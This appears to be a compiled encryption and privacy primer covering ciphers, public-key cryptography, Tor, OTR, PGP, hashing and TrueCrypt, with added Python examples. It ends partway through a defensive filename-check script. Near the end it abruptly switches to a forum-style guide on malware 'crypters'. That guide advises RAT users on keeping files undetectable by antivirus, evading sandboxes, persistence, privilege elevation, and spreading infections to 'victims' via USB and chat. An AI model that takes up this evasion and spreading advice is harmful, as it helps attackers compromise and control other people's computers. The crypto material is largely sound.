Breaking ciphers of this kind is a straightforward pencil and paper puzzle, which you may have done in primary school. The trick is that some letters, and combinations of letters, are much more common than others; in English the most common letters are e, t, a, i, o, n, s, h, r, d, l, u in that order. Artificial intelligence researchers have shown some interest in writing programs to solve mono-alphabetic substitutions using letter and digraph (letter-pair) frequencies alone. They typically succeed with about 600 letters of ciphertext, while smarter strategies, such as guessing probable words, can cut this to about 150 letters. A human cryptanalyst will usually require much less.

Another example of cryptography is the substitution cipher, or simple substitution. For example:

(Image taken from ecee.colorado.edu)

Data Encryption and Decryption

The difference is that encryption is the process of translating plain text data (plaintext) into something that appears to be random and meaningless (ciphertext). Decryption is the process of converting ciphertext back to plaintext.

To encrypt more than a small amount of data, symmetric encryption is used. A symmetric key is used during both the encryption and decryption processes. To decrypt a particular piece of ciphertext, the key that was used to encrypt the data must be used.

The goal of every encryption algorithm is to make it as difficult as possible to decrypt the generated ciphertext without using the key. If a really good encryption algorithm is used, there is no technique significantly better than methodically trying every possible key. For such an algorithm, the longer the key, the more difficult it is to decrypt a piece of ciphertext without possessing the key.

It is difficult to determine the quality of an encryption algorithm. Algorithms that look promising sometimes turn out to be very easy to break, given the proper attack. When selecting an encryption algorithm, it is a good idea to choose one that has been in use for several years and has successfully resisted all attacks.

Symmetric and Asymmetric Encryption

There are two basic techniques for encrypting information: symmetric encryption (also called secret key encryption) and asymmetric encryption (also called public key encryption).

Symmetric Encryption

Symmetric encryption is the oldest and best-known technique. A secret key, which can be a number, a word, or just a string of random letters, is applied to the text of a message to change the content in a particular way. This might be as simple as shifting each letter by a number of places in the alphabet. As long as both sender and recipient know the secret key, they can encrypt and decrypt all messages that use this key.

“The keys, in practice, represent a shared secret between two or more parties that can be used to maintain a private information link. This requirement that both parties have access to the secret key is one of the main drawbacks of symmetric key encryption, in comparison to public-key encryption.” - Wikipedia (Symmetric-key algorithm)

Types of symmetric-key algorithms:

Symmetric-key encryption can use either stream ciphers or block ciphers.

● Stream ciphers encrypt the digits (typically bytes) of a message one at a time.

● Block ciphers take a number of bits and encrypt them as a single unit, padding the plaintext so that it is a multiple of the block size. Blocks of 64 bits have been commonly used. The Advanced Encryption Standard (AES) algorithm approved by NIST in December 2001 uses 128-bit blocks.

Asymmetric Encryption

The problem with secret keys is exchanging them over the Internet or a large network while preventing them from falling into the wrong hands. Anyone who knows the secret key can decrypt the message. One answer is asymmetric encryption, in which there are two related keys—a key pair. A public key is made freely available to anyone who might want to send you a message. A second, private key is kept secret, so that only you know it.

“The strength lies in the “impossibility” (computational impracticality) for a properly generated private key to be determined from its corresponding public key. Thus the public key may be published without compromising security. Security depends only on keeping the private key private. Public key algorithms, unlike symmetric key algorithms, do not require a secure channel for the initial exchange of one (or more) secret keys between the parties.” - Wikipedia (Public-key cryptography)

Any message (text, binary files, or documents) that is encrypted by using the public key can only be decrypted by applying the same algorithm, but by using the matching private key. Any message that is encrypted by using the private key can only be decrypted by using the matching public key.

This means that you do not have to worry about passing public keys over the Internet (the keys are supposed to be public). A problem with asymmetric encryption, however, is that it is slower than symmetric encryption. It requires far more processing power to both encrypt and decrypt the content of the message.
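To make the key-pair relationship concrete, here is a toy RSA key pair in Python. This is an added example, not code from the book: the two primes, the public exponent and the message are constructed values chosen so the numbers stay readable, and it is textbook RSA with no padding, which illustrates the mechanism but is not how a real library encrypts.

```python
"""Toy RSA: one key pair, and the two properties stated in the text.
Added example.  Textbook RSA with fixed primes and no padding, for
illustration only; real systems use large random primes and padding."""
from math import gcd

# Constructed key material: two well-known primes, small enough to print
# but large enough that a 7-byte message fits under the modulus n = p * q.
P = 1_000_000_007
Q = 998_244_353
PUBLIC_EXPONENT = 65537


def make_keypair(p: int = P, q: int = Q, e: int = PUBLIC_EXPONENT):
    """Return ((e, n), (d, n)): the public key and its matching private key."""
    n = p * q
    phi = (p - 1) * (q - 1)
    if gcd(e, phi) != 1:
        raise ValueError("public exponent must be coprime to phi(n)")
    d = pow(e, -1, phi)  # modular inverse of e (Python 3.8+)
    return (e, n), (d, n)


def apply_key(value: int, key) -> int:
    """One modular exponentiation.  The same operation serves both
    directions: which key you hold decides what you can undo."""
    exponent, n = key
    if not 0 <= value < n:
        raise ValueError("value must be smaller than the modulus")
    return pow(value, exponent, n)


def encrypt_text(message: str, key) -> int:
    """Encode a short message as an integer and apply the given key."""
    return apply_key(int.from_bytes(message.encode(), "big"), key)


def decrypt_text(ciphertext: int, key) -> str:
    """Apply the given key and decode the integer back to text."""
    value = apply_key(ciphertext, key)
    return value.to_bytes((value.bit_length() + 7) // 8, "big").decode()


def roundtrip(message: str) -> dict:
    """Show both directions from the text: public-encrypt/private-decrypt,
    and private-encrypt/public-decrypt (the shape of a digital signature)."""
    public, private = make_keypair()
    c = encrypt_text(message, public)          # anyone can do this
    s = encrypt_text(message, private)         # only the key holder can
    return {
        "ciphertext": c,
        "private_decrypts": decrypt_text(c, private),
        "public_undoes_private": decrypt_text(s, public),
    }


if __name__ == "__main__":
    print(roundtrip("secret!"))
```

Applying the public key a second time to the ciphertext does not recover the message, which is the point of the pair: the public exponent undoes only what the private exponent did, and vice versa.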

Secure Communications Equals Better Privacy

“Encryption works. Properly implemented strong crypto systems are one of the few things that you can rely on. Unfortunately, endpoint security is so terrifically weak that NSA can frequently find ways around it.” - Edward Snowden, answering questions live on the Guardian’s website

The NSA is the biggest, best funded spy agency the world has ever seen. They spend billions upon billions of dollars each year doing everything they can to vacuum up the digital communications of most humans on this planet that have access to the Internet and the phone network. And as the recent reports in the Guardian and Washington Post show, even domestic American communications are not safe from their net.

Defending yourself against the NSA, or any other government intelligence agency, is not simple, and it’s not something that can be solved just by downloading an app. But thanks to the dedicated work of civilian cryptographers and the free and open source software community, it’s still possible to have privacy on the Internet, and the software to do it is freely available to everyone. This is especially important for journalists communicating with sources online.

“We discovered something. Our one hope against total domination. A hope that with courage, insight and solidarity we could use to resist. A strange property of the physical universe that we live in. The universe believes in encryption.

It is easier to encrypt information than it is to decrypt it.” - Julian Assange

When Snowden uses the term “endpoint security” he means the security of the computers on either end of the conversation that are doing the encrypting and the decrypting, as opposed to the security of the message when it’s in transit. If you send an encrypted email to a friend but you have a keylogger on your computer that’s logging the entire message, as well as the passphrase that’s protecting your encryption keys, your encryption isn’t worth very much.

Proprietary software, such as much of what’s released by Microsoft, Apple, and Google, has another flaw. It’s much more difficult for users to independently verify that secret backdoors don’t exist at the clandestine demands of the surveillance state. Though recent reports have shown that many companies hand over an unknown amount of information in response to FISA requests, none have been shown to have direct backdoors into their systems.

There is other software that’s more reliable in this regard. Free and open source software is not always user friendly and it’s not always secure. However, when it’s developed in the open, with open bug trackers, open mailing lists, open governing structures, and open source code, it’s much more difficult for these projects to have a policy of betraying their users like Microsoft has.

It’s important to remember that just because you use free software doesn’t mean you can’t get hacked. People find zero day exploits for free software all the time, and sometimes sell them to governments and other malicious attackers. Free software users still download malicious attachments in their email, and they still often have badly configured and easily exploited services on their computers. And even worse, malware is often very good at hiding. If a free software user gets malware on their computer, it might stay there until the user formats their hard drive.

Tails, which is a live DVD and live USB GNU/Linux distribution that I will discuss in detail below, solves many of these problems.

Anonymize Your Location with Tor

Tor is a software service that allows you to use the Internet while concealing your IP address, which is, in general, a fairly accurate representation of your location. The Tor network is made up of over 3,600 volunteer servers called nodes. When someone uses the Tor network to visit a website their connection gets bounced through three of these nodes (called a circuit) before finally exiting into the normal Internet. Anyone intercepting traffic will think your location is the final node which your traffic exits from.

It’s important to remember that just because your connection to the Internet may be anonymous that doesn’t magically make it secure. EFF has made a great visualization of how Tor and HTTPS can work together to protect your privacy.

Like all good cryptographic software, Tor is free software, complete with an open bug tracker, mailing lists, and source code.

We still don’t know whether or not NSA or GCHQ counts as a global adversary, but we do know that they monitor a large portion of the Internet. It’s too early to know for sure how often these intelligence agencies can defeat the anonymity of the Tor network.

Even if they can, using Tor still gives us many advantages. It makes their job much harder, and we leave much less identifying data on the servers we connect to through the Tor network. It makes it much harder to be the victim of a MITM attack at our local network or ISP level. And even if some Tor circuits can be defeated by a global adversary, if enough people are getting their traffic routed through the same Tor nodes at the same time, it might be difficult for the adversary to tell which traffic belongs to which circuits.

The easiest way to start using Tor is to download and install the Tor Browser Bundle.

Off-the-Record (OTR) Chat

Off-the-Record (OTR) is a layer of encryption that can be added to any existing instant message chat system, provided that you can connect to that chat system using a chat client that supports OTR, such as Pidgin or Adium. With OTR it’s possible to have secure, end-to-end encrypted conversations over services like Google Talk and Facebook chat without Google or Facebook ever having access to the contents of the conversations. Note: this is different than the “off-the-record” option in Google, which is not secure. And remember: while Google and Facebook’s HTTPS connection is very valuable for protecting your message while it’s in transit, they still have the keys to your conversations so they can hand them over to authorities.

OTR is used for two things: encrypting the contents of real-time instant message conversations and verifying the identity of people that you chat with. Identity verification is extremely important and something that many OTR users neglect to do. While OTR is much more user friendly than other forms of public key encryption, if you wish to use it securely you still need to understand how it works and what attacks against it are possible.

Using OTR only encrypts the contents of your chat conversations but not the metadata related to them. This metadata includes who you talk to and when and how often you talk to them. For this reason I recommend using a service that isn’t known to collaborate with intelligence agencies. While this won’t necessarily protect your metadata, at least you have a chance of keeping it private.

I also recommend you use an XMPP (also known as Jabber) service. Like email, Jabber is a federated, open protocol. Users of riseup.net’s Jabber service can chat with users of jabber.ccc.de’s service as well as jabber.org’s service.

To use OTR you’ll need to download software. If you use Windows you can download and install Pidgin and separately the OTR plugin. If you use GNU/Linux you can install the pidgin and pidgin-otr packages. You can read through documentation on how to set up your Pidgin accounts with OTR. If you use Mac OS X you can download and install Adium, which is a free software chat client that includes OTR support. You can read the official documentation on how to get set up with OTR encryption with Adium.

When you start using OTR, your chat client generates an encryption key and stores it in a file in your user’s home folder on your hard drive. If your computer or smartphone gets lost, stolen, or infected with malware, it’s possible that your OTR key can get compromised. If this happens, it would be possible for an attacker with control over your Jabber server to mount a MITM attack against you while you’re chatting with people who have previously verified your identity.

“Pretty Good Privacy” (PGP) Email Encryption

In 1991, Phil Zimmermann developed email encryption software called Pretty Good Privacy, or PGP, which he intended peace activists to use while organizing in the anti-nuclear movement.

Today, PGP is a company that sells a proprietary encryption program by the same name. OpenPGP is the open protocol that defines how PGP encryption works, and GnuPG (GPG for short) is free software, and is 100% compatible with the proprietary version. GPG is much more popular than PGP today because it’s free for everyone to download, and cypherpunks trust it more because it’s open source. The terms PGP and GPG are often used interchangeably.

As with OTR, each person who wishes to send or receive encrypted email needs to generate their own PGP key, called a key pair. PGP key pairs are split into two parts, the public key and the secret key.

If you have someone’s public key, you can do two things: encrypt messages that can only be decrypted with their secret key, and verify signatures that were generated with their secret key. It’s safe to give your public key to anyone who wants it. The worst anyone can do with it is encrypt messages that only you can decrypt.

With your secret key you can do two things: decrypt messages that were encrypted using your public key, and digitally sign messages. It’s important to keep your secret key secret. An attacker with your secret key can decrypt messages intended only for you, and he can forge messages on your behalf. Secret keys are generally encrypted with a passphrase, so even if your computer gets compromised and your secret key gets stolen, the attacker would need to get your passphrase before he would have access to it. Unlike OTR, PGP does not have forward secrecy. If your PGP secret key is compromised and the attacker has copies of any historical encrypted emails you have received, he can go back and retroactively decrypt them all.

Since you need other people’s public keys in order to encrypt messages to them, PGP software lets you manage a keyring with your secret key, your public key, and all of the public keys of the people you communicate with.
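The two-keys-two-jobs rule from the asymmetric encryption section and the public/secret key description above are the same mechanics, so one added example covers both (it is not code from the book and not how GnuPG is implemented): textbook RSA, where encrypting with the public key is undone only by the secret key, and signing with the secret key is checked by anyone holding the public key. The primes are two known Mersenne primes chosen to give a small toy modulus; real OpenPGP adds padding (OAEP/PSS), encrypts the message with a symmetric session key and only wraps that key with RSA, and protects the secret key with a passphrase.

```python
"""Key pair mechanics behind PGP, shown with textbook RSA.

Added example: fixed demo primes, no padding, and no hybrid encryption, so
this is for understanding the public/secret key relationship only.
"""
import hashlib
from dataclasses import dataclass
from typing import Tuple


@dataclass(frozen=True)
class PublicKey:
    n: int
    e: int


@dataclass(frozen=True)
class SecretKey:
    n: int
    d: int


def generate_keypair(p: int, q: int, e: int = 65537) -> Tuple[PublicKey, SecretKey]:
    """Builds the pair from two primes. Real key generation picks random
    primes of 1024+ bits; the caller supplies small fixed ones here."""
    n = p * q
    phi = (p - 1) * (q - 1)
    d = pow(e, -1, phi)           # modular inverse of e (Python 3.8+)
    return PublicKey(n, e), SecretKey(n, d)


def encrypt(pub: PublicKey, message: bytes) -> int:
    """Anyone with the public key can do this; only the secret key undoes it."""
    m = int.from_bytes(message, "big")
    if m >= pub.n:
        raise ValueError("message too long for this toy modulus")
    return pow(m, pub.e, pub.n)


def decrypt(sec: SecretKey, ciphertext: int) -> bytes:
    m = pow(ciphertext, sec.d, sec.n)
    return m.to_bytes((m.bit_length() + 7) // 8, "big")   # drops leading zero bytes


def _digest(message: bytes, n: int) -> int:
    """Hash first, then reduce into the key's range: a signature covers a
    fixed-size fingerprint of the message, not the message itself."""
    return int.from_bytes(hashlib.sha256(message).digest(), "big") % n


def sign(sec: SecretKey, message: bytes) -> int:
    """'Encrypting with the private key', as the text puts it: s = H(m)^d mod n."""
    return pow(_digest(message, sec.n), sec.d, sec.n)


def verify(pub: PublicKey, message: bytes, signature: int) -> bool:
    """Anyone holding the public key checks s^e mod n == H(m)."""
    return pow(signature, pub.e, pub.n) == _digest(message, pub.n)


# constructed key material: the known Mersenne primes 2^61-1 and 2^89-1
P = 2**61 - 1
Q = 2**89 - 1
ALICE_PUB, ALICE_SEC = generate_keypair(P, Q)


def demo() -> dict:
    msg = b"meet at noon"                       # constructed message
    ct = encrypt(ALICE_PUB, msg)                # Bob encrypts to Alice's public key
    sig = sign(ALICE_SEC, msg)                  # Alice signs with her secret key
    return {
        "decrypts_to_original": decrypt(ALICE_SEC, ct) == msg,
        "signature_valid": verify(ALICE_PUB, msg, sig),
        "forged_message_rejected": not verify(ALICE_PUB, b"meet at dusk", sig),
        "ciphertext_differs_from_message": ct != int.from_bytes(msg, "big"),
    }


if __name__ == "__main__":
    print(demo())
```

Note the asymmetry the text describes: `encrypt` and `verify` need only the public key, `decrypt` and `sign` need the secret key, and a signature made over one message fails verification against any other.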

Using PGP for email encryption can be very inconvenient. For example, if you set up PGP on your computer but have received an encrypted email on your phone, you won’t be able to decrypt it to read the email until you get to your computer.

Passphrases

The security of crypto often relies on the security of a password. Since passwords are very easily guessed by computers, cryptographers prefer the term passphrase to encourage users to make their passwords very long and secure.

Comic courtesy XKCD

For tips on choosing good passphrases, read the passphrase section of EFF’s Defending Privacy at the U.S. Border: A Guide for Travelers Carrying Digital Devices whitepaper, and also the Diceware Passphrase Home Page.

In addition to protecting PGP secret keys, you also need to choose good passphrases for disk encryption and password vaults.
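As an added example of the Diceware approach the text points to (not code from the book or from the Diceware project), the block below generates a passphrase with the operating system's CSPRNG and puts numbers on "very long": entropy is the word count times log2 of the list size, so six words from the real 7,776-word list beat an eight-character password drawn from all printable ASCII. The 32-word list is a constructed stand-in for the real list; the arithmetic is identical for either.

```python
"""Diceware-style passphrase generation and strength estimate.

Added example: SAMPLE_WORDS is a constructed 32-word list standing in for
the 7,776-word Diceware list (five dice rolls, 6**5 entries).
"""
import math
import secrets

SAMPLE_WORDS = (
    "anchor", "basket", "candle", "dragon", "ember", "falcon", "garden", "harbor",
    "island", "jacket", "kettle", "lantern", "meadow", "needle", "orbit", "pepper",
    "quartz", "ribbon", "saddle", "timber", "umbrella", "velvet", "walnut", "xenon",
    "yellow", "zipper", "marble", "pocket", "silver", "tunnel", "violet", "window",
)
DICEWARE_LIST_SIZE = 6 ** 5       # 7776 words indexed by five dice rolls
PRINTABLE_ASCII = 95              # character set of a typical "complex" password


def entropy_bits(n_symbols: int, alphabet_size: int) -> float:
    """Entropy of n independent uniform picks from an alphabet (words or chars)."""
    return n_symbols * math.log2(alphabet_size)


def generate_passphrase(n_words: int, words=SAMPLE_WORDS, sep: str = " ") -> str:
    """secrets.choice draws from the OS CSPRNG, so each word is an
    independent uniform pick and the entropy estimate above actually holds;
    random.choice would not give that guarantee."""
    return sep.join(secrets.choice(words) for _ in range(n_words))


def words_for_target(target_bits: float, list_size: int) -> int:
    """Smallest word count that reaches target_bits of entropy."""
    return math.ceil(target_bits / math.log2(list_size))


def expected_crack_seconds(bits: float, guesses_per_second: float) -> float:
    """On average an attacker searches half the space before hitting the phrase."""
    return (2 ** bits) / 2 / guesses_per_second


def demo() -> dict:
    return {
        "eight_char_password_bits": round(entropy_bits(8, PRINTABLE_ASCII), 1),
        "six_word_diceware_bits": round(entropy_bits(6, DICEWARE_LIST_SIZE), 1),
        "words_for_80_bits": words_for_target(80, DICEWARE_LIST_SIZE),
        "sample_passphrase": generate_passphrase(6),
    }


if __name__ == "__main__":
    print(demo())
```

The passphrase is only as strong as the estimate claims if every word is chosen uniformly at random; a phrase the user composes by hand has far less entropy than its length suggests.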

Cryptographic Hash Function

The fundamental difference between hash and encryption techniques is that hashing is irreversible while encryption is reversible.

Hash algorithms generate a digest of fixed length for a given input plain text. The output cannot be converted back to the input text. The generated output will always be the same for a given input that is hashed using any one of the hashing algorithms (MD5, SHA etc.), no matter how many times the process is repeated.

Encryption employs secret keys to encrypt plain text and convert it into ciphertext, but differs from hashing since this process is reversible, i.e. the ciphertext can be decrypted back to plain text using the secret key. However, encryption algorithms vary in the way the keys are used: 1) Symmetric encryption algorithms (like AES, DES, RC2 etc.) use the same key for encryption and decryption; 2) Asymmetric algorithms (like RSA, DSA etc.) use public and private key pairs to encrypt and decrypt plain text.

Cryptographic hash functions have many information security applications, notably in digital signatures, message authentication codes (MACs), and other forms of authentication. They can also be used as ordinary hash functions, to index data in hash tables, for fingerprinting, to detect duplicate data or uniquely identify files, and as checksums to detect accidental data corruption. Indeed, in information security contexts, cryptographic hash values are sometimes called (digital) fingerprints, checksums, or just hash values, even though all these terms stand for more general functions with rather different properties and purposes.
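The properties and uses just listed, as an added example built on Python's standard library (hashlib and hmac; not code from the book): a fixed-length, deterministic digest that changes drastically when one byte of input changes, chunked file fingerprinting with checksum verification, and a keyed MAC, which is what a plain hash cannot give you because anyone can recompute an unkeyed digest. The file contents and the MAC key are constructed for the demo.

```python
"""Cryptographic hash properties and two of their uses: file fingerprints
and message authentication codes.

Added example; sample file and key material are constructed.
"""
import hashlib
import hmac
import os
import tempfile


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def bits_changed(digest_a: str, digest_b: str) -> int:
    """Hamming distance between two hex digests (the avalanche effect)."""
    return bin(int(digest_a, 16) ^ int(digest_b, 16)).count("1")


def file_fingerprint(path: str, algorithm: str = "sha256", chunk_size: int = 65536) -> str:
    """Hash a file in chunks so a large file never has to fit in memory."""
    h = hashlib.new(algorithm)
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()


def verify_download(path: str, expected_hex: str) -> bool:
    """Checksum verification catches corruption; it also catches tampering,
    but only if the expected digest came over a channel the attacker could
    not alter (a published digest next to the file on the same server does not)."""
    return hmac.compare_digest(file_fingerprint(path), expected_hex.lower())


def mac(key: bytes, message: bytes) -> str:
    """HMAC mixes a secret key into the hash, so only key holders can
    produce or check a valid tag; an unkeyed hash authenticates nothing."""
    return hmac.new(key, message, hashlib.sha256).hexdigest()


def mac_valid(key: bytes, message: bytes, tag: str) -> bool:
    # compare_digest runs in constant time; == would leak how many bytes matched
    return hmac.compare_digest(mac(key, message), tag)


def demo() -> dict:
    d1 = sha256_hex(b"abc")
    d2 = sha256_hex(b"abd")                          # one byte changed
    with tempfile.TemporaryDirectory() as tmp:
        path = os.path.join(tmp, "sample.iso")       # constructed file
        with open(path, "wb") as f:
            f.write(b"constructed file contents\n" * 1000)
        good = file_fingerprint(path)
        with open(path, "ab") as f:
            f.write(b"\x00")                         # simulate corruption in transit
        corrupted_accepted = verify_download(path, good)
    key = b"constructed-shared-key"
    tag = mac(key, b"transfer 100")
    return {
        "digest_hex_length": len(d1),                # 64 hex chars = 256 bits, always
        "deterministic": d1 == sha256_hex(b"abc"),
        "bits_changed_by_one_byte_edit": bits_changed(d1, d2),
        "corrupted_file_rejected": not corrupted_accepted,
        "mac_accepts_original": mac_valid(key, b"transfer 100", tag),
        "mac_rejects_modified": not mac_valid(key, b"transfer 900", tag),
    }


if __name__ == "__main__":
    print(demo())
```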

File Encryption and Decryption

Should I encrypt my files? First of all, a short answer: yes. Things can get stolen even if you don’t share your computer. All someone needs is a few minutes in front of the keyboard to retrieve anything they want. A login password won’t protect you, either.

So should you encrypt your sensitive files? Yes. But there’s a bit more to it than that. You have two big choices when it comes to encryption: do you just encrypt the important stuff, or do you encrypt your entire drive? Each has pros and cons:

● Encrypting a select group of files—like the ones that contain personal information—keeps them safe without any extra complications. However, if someone had access to your computer, they could still break into it and view any non-encrypted files, access your browser, install malware, and so on.

● Encrypting your entire drive makes it difficult for anyone to access any of your data or even boot up your computer without your password. However, if you experience any corruption on your drive, it’s much less likely that you’ll be able to retrieve that data.

I generally recommend against average users encrypting their entire drive. Unless you have sensitive files all over your computer, or have other reasons for encrypting the entire thing, it’s easier to encrypt the sensitive files and call it a day. Full disk encryption is more secure, but can also be much more problematic if you don’t put in the work to keep everything backed up safely (and then encrypt those backups as well).

That said, we’ll show you how to do both in this guide, and what you do is up to you. We’ll talk a bit more about each situation in its individual section below.

How to Encrypt Individual Files or Folders with TrueCrypt

If you need to keep a few files safe from prying eyes, you can encrypt them with the free, open-source, cross-platform TrueCrypt. These steps should work on Windows, OS X, and Linux.

TrueCrypt is no longer in active development though, but you should be able to follow these same instructions with its more up-to-date successor, VeraCrypt.

Creating a TrueCrypt volume for your files is insanely easy—just follow TrueCrypt’s step-by-step wizard. Here’s an overview of what it entails:

1. Start TrueCrypt and click the Create Volume button.

2. On the first screen of the wizard, select “Create an encrypted file container.”

3. On the next screen, choose “Standard TrueCrypt Volume.” If you want to create a hidden volume (to further obscure your data), read more about how it works here. We won’t cover it in this tutorial.

4. On the Volume Location screen, click the Select File button and navigate to the folder in which you want to store your encrypted files. Do not select an existing file as this will delete it—instead, navigate to the folder, type the desired name of your encrypted volume in the “File Name” box, and click Save. We’ll add files to this TrueCrypt volume later.

5. Choose your encryption algorithm on the next screen. AES should be fine for most users, though you can read up on the other options if you so choose. Remember: some options might be more secure, but slower than others.

6. Choose the size of your volume. Make sure it has enough space to fit all your files, and any files you may want to add to it later.

7. Choose a password to protect your files. Remember, the stronger your password, the safer your files will be. Make sure you remember your password, because if you lose it, your data will be inaccessible.

8. On the next screen, follow the instructions and move your mouse around randomly for a bit. This will ensure TrueCrypt generates a strong, random key. Then click Next to continue with the wizard.

9. Choose a file system for your encrypted volume. If you’re storing files over 4GB inside, you’ll need to choose NTFS. Click Format to create the volume.

To mount your volume, open up TrueCrypt and click the “Select File” button. Navigate to the file you just created. Then, select an open drive letter from the list and click the Mount button. Type in your password when prompted, and when you’re done, your encrypted volume should show up in Windows Explorer, as if it were a separate drive. You can drag files to it, move them around, or delete them just like you would any other folder. When you’re done working with it, just head back into TrueCrypt, select it from the list, and click Dismount. Your files should stay safely hidden away.

Alternative Tools

TrueCrypt has long been one of the most popular encryption tools out there, and it’s one of the easiest to set up. It isn’t the only option, however. 7-Zip is also a great way to encrypt your files, as is BitLocker, which comes with the Pro version of Windows 8 (or the Enterprise and Ultimate versions of Windows 7).

Term ‘Crypter’ (Encryption software)

In some circles, “crypter” and “packer” are synonymous, meaning binaries or programs which are self-checking and/or self-modifying. Crypters may, more specifically, mean self-modification that includes encryption and/or code scrambling (see more below).

What’s the difference between a Crypter and a Packer?

A Crypter encrypts your files and a Packer packs your files, usually with the intention of making them smaller in size and sometimes for scantime undetection.

Difference between Scantime and Runtime crypters.

A file is scantime detected if the AV detects it before it’s run, or when a scan is running the file is found and marked as a threat. Scantime detections are caused by visible instructions or PE info such as Assembly/Icon, Cloned Certificates, Resource Type and Size, Instructions and more. That means that essentially what RAT/Server you crypt will make little to no difference on scantime detections as the file is encrypted in an unrecognizable way.

A file is runtime detected if, only after the file is run, it triggers the AV program to block, stop or delete the program in question. Runtime detections are caused by behaviour. Basically how your file acts and runs can prompt a runtime detection. The RAT/Server you crypt WILL affect the runtime detection. To avoid runtime detections, you should refrain from using overused settings, i.e. rootkits will most likely prompt a detection. Your best bet is to use as few options as possible from the server and more from the crypter. Why? Because it is easy to target the behaviour of a widely used RAT, when it never really gets updated or changed. Crypters get updated and modified so it is more reliable to use their settings to avoid detections. A way to prevent some runtime detections is also to use Anti Memory Scan, which will basically deny access to the memory space your server is running in.

How do I know which Antivirus is detecting my file?

There are so many sites with this same purpose of scanning files and giving a report of which antiviruses detect your files. The main issue leading to crypters becoming detected is that if you, or someone who is in possession of your crypted file, scans it on some of these scanner sites, the crypted file will be distributed to the antivirus vendors, thus causing the crypted code overwritten on your file to become detected, which in turn causes your crypter to turn out detected.

Types and Forms of Crypters.

Crypters can range in many types and forms and it is important to understand these types and forms because it will help you choose a quality crypter to solve your needs or help you realize what options and features you would want to implement in your own Crypter. Here are some simple and advanced crypters to give you a good idea, or picture in your head.

Finding Crypters, and Crypters themselves, can be a huge pain. I know when I first started out, I hated the fact that I just couldn’t find a FREE FUD CRYPTER anywhere. But I don’t recommend using free crypters as your file will be detected within a few days or maybe a week if you’re lucky enough; that’s where paid crypters or private crypters come in handy.

Crypter Features & Description

● Startup/Installation: Module of the stub that adds your crypted file to the list of programs to run with Windows at start! Many different types: using Registry, Tasks, copying the file to the Startup Folder, etc.

● Startup Persistence: Module that will constantly check if your file has been removed from the startup list.

● Process/Injection: Persistence module that will constantly check if your server has been killed; if it has, start it or inject the payload again. Again many different ways of achieving this, i.e. Watchdog, DLL Injection and the list continues.

● Anti-Memory Scan: Module that will deny access to anything that tries to read the payload you injected. Extremely helpful against Runtime Detections.

● Elevate Process/Privileges: Attempts to gain Admin Rights for your file.

● Critical Process: Changes certain attributes of your running file that will cause a BSOD (Blue Screen of Death) if the process is terminated.

● Mutex: A very useful feature to make sure your file is not running more than once at the same time. Most RATs have this feature so it is not essential on crypters.

● Melt File: Removes/Deletes your file after it is successfully run.

● Extension Spoofer: Simple trick with a Unicode Character called “LeftToRight”. Doesn’t change the actual extension but will make it look like something else. If you’re trying to make it look like a picture, did you know you can rename the extension from .exe to .scr (Screen Saver)?

● File Pumper: Adds a set number of bytes (with value 0) to the end of your file, increasing its size but without disrupting any procedures on runtime.

● Compress: Decreases the output size.

● Icon or Assembly Clone: Copies the Assembly Information or the Icon of a chosen file. (Good to bypass some Generic detections)

● Encryption Algorithm: Function used to transform the bytes of your RAT/Server into something completely different. Which algorithm you use will essentially make little to no difference on detection.

● Delay Execution: Used to “stop” or pause your file, while running, for a certain period of time. Adding 30+ seconds will in some cases help bypass runtime detections, believe it or not.

● Binder: Adds another file to the stub; now your stub will run the RAT/Server but also the file you binded, one after the other! (Means you can run a legit program and your RAT at the same time, win win!)

● Downloader: Well that’s obvious, downloads and runs a file from a given URL.

● USG – Unique Stub Generator: Will make sure your stub is as different as possible from previous crypts. Cheap versions of USG will only rename variables and methods – making not much difference at all.

● Fake Message Box: A message box will pop up when the file is executed. You can choose for it to display whatever message. I’ll let you figure out why this is useful when spreading.

● Hide File: Sets the option of your file to be Hidden so the infected person cannot see your file in the folder. Victims can still see the files if the “Show Hidden Files and Folders” option on their computer is on.

● Antis: Stop your file from running if certain programs are running in the background. Most common Antis are: Anti Virtual Machine (VMWare, VirtualBox and VirtualPC), Anti Sandboxie, Anti Wireshark, Anti Fiddler, Anti Debugger, Anti Anubis.

● Botkill: Searches for any existing files or processes that might be malware and attempts to kill/remove them from the system.

● Remove/Change Zone ID: Zone ID information is recorded on the file to let Windows know where it came from (in most cases causing the SmartScreen, or the “Are you sure you want to run this file?” box). This module will remove the Zone ID the file was given. The different values are: 0 – Local Machine, 1 – Intranet, 2 – Trusted, 3 – Internet, 4 – Untrusted.

● Spreaders: Attempts to copy your file to places where it might infect other users. Most spreaders don’t work, so don’t be fooled. Common spreaders: USB – Will copy your file to any USB connected to the PC. Back in the day they would also set up an autorun.inf file to make the server execute as soon as the USB is connected to another PC. Autorun no longer works on Windows. Rar/Zip – adds your file to the files inside the compressed folder. Chat/IM (Skype, Facebook, Omegle, Twitter) – Messages other people with an infected link or attempts to send them an infected file. Lan – Doesn’t work, so don’t bother.

● Junk Code: Adds useless, unnecessary lines of code/instructions in an attempt to bypass some less specific Scantime Detections. Somewhat efficient but also increases the stub size.

● Remove Version Info: Deletes a resource called VersionInfo, which contains all the assembly information. Helps get rid of Kazy generic detection when all you have tried has failed.

● Require Admin: Prompts a UAC window asking the slave to run the file as Admin.

● Certificate Clone/Forger: Adds a Certificate to your file copied from other signed Applications; the certificate will be invalid but makes your file look a bit more legit.
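From the defender's side, the extension spoofer and the .exe-to-.scr rename above are the easiest of these features to catch at a mail gateway or file share, because they live in the filename. The following is an added example, not code from the book: it flags Unicode bidirectional override characters (the override the text refers to is one of these; U+202E, right-to-left override, is the one that reverses the displayed tail of a name), document-looking double extensions such as photo.jpg.exe, and executable extensions including .scr, and it shows what the user would actually see. The sample names are constructed and the extension lists are a starting point, not exhaustive.

```python
"""Defender-side filename check for the disguised-extension tricks.

Added example; SAMPLE_NAMES are constructed and the extension sets are
assumptions to be tuned per environment.
"""

EXECUTABLE_EXTENSIONS = {
    "exe", "scr", "com", "pif", "bat", "cmd", "vbs", "js", "jse",
    "wsf", "hta", "msi", "dll", "lnk", "ps1",
}
DOCUMENT_EXTENSIONS = {"jpg", "jpeg", "png", "gif", "pdf", "doc", "docx", "xls", "xlsx", "txt"}
# Unicode bidirectional controls; RLO (U+202E) reverses how the text after it is shown
BIDI_CONTROLS = {"\u202a", "\u202b", "\u202c", "\u202d", "\u202e",
                 "\u2066", "\u2067", "\u2068", "\u2069"}
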